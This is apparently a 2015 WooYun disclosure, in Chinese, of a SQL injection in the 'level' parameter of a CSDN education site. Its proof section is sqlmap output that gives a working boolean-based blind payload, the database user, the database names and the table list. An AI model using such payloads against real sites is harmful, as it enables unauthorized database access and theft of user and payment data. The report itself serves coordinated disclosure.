当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0118770

漏洞标题:CSDN某站存在SQL注射漏洞

相关厂商:CSDN开发者社区

漏洞作者: 路人甲

提交时间:2015-06-07 11:43

修复时间:2015-07-22 13:38

公开时间:2015-07-22 13:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-07: 细节已通知厂商并且等待厂商处理中
2015-06-07: 厂商已经确认,细节仅向厂商公开
2015-06-17: 细节向核心白帽子及相关领域专家公开
2015-06-27: 细节向普通白帽子公开
2015-07-07: 细节向实习白帽子公开
2015-07-22: 细节向公众公开

简要描述:

详细说明:

http://edu.csdn.net/courses/p4?attr=3&c_id=0&level=2&t=


x20150607112334.png


x20150607112446.png

漏洞证明:

---
Parameter: level (GET)
Type: boolean-based blind
Title: MySQL >= 5.0 boolean-based blind - Parameter replace
Payload: attr=3&c_id=0&level=(SELECT (CASE WHEN (1896=1896) THEN 1896 ELSE 1896*(SELECT 1896 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&t=
---
web application technology: PHP 5.5.17
back-end DBMS: MySQL 5.0
current user: 'csdnedu@192.168.110.26'
available databases [2]:
[*] information_schema
[*] training
Database: training
[57 tables]
+---------------------------+
| alipay_log |
| c_port_log |
| column_course_type |
| combo_course |
| combo_info |
| course_admin_log |
| course_agency |
| course_album |
| course_album_lecturer |
| course_buy_record |
| course_carousel |
| course_column |
| course_column_type |
| course_comment |
| course_favorate |
| course_fields |
| course_info |
| course_lecture_students |
| course_lecturer |
| course_lesson |
| course_lesson_record |
| course_record |
| course_reg_basic |
| course_reg_identy |
| course_reg_question |
| course_regfuser_expand |
| course_regnouser_expand |
| course_regquestion_option |
| course_reguser_expand |
| course_regusers_check_log |
| course_statistics |
| course_syllabus |
| course_tag_relate |
| course_test |
| course_video |
| course_video_jobs |
| filter_words |
| lecturer_book |
| log |
| log_download |
| m3u8_keys |
| notice_mail |
| notice_message |
| order_detail |
| orders |
| resources |
| test_log |
| tickets |
| tickets_group |
| tmp_acl |
| trial_info |
| trial_users |
| type_tag |
| uc_log |
| vip_card |
| vip_card_apply |
| vip_card_buy_record |
+---------------------------+

修复方案:

貌似做了很大的修复上次。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-06-07 13:37

厂商回复:

多谢。

最新状态:

暂无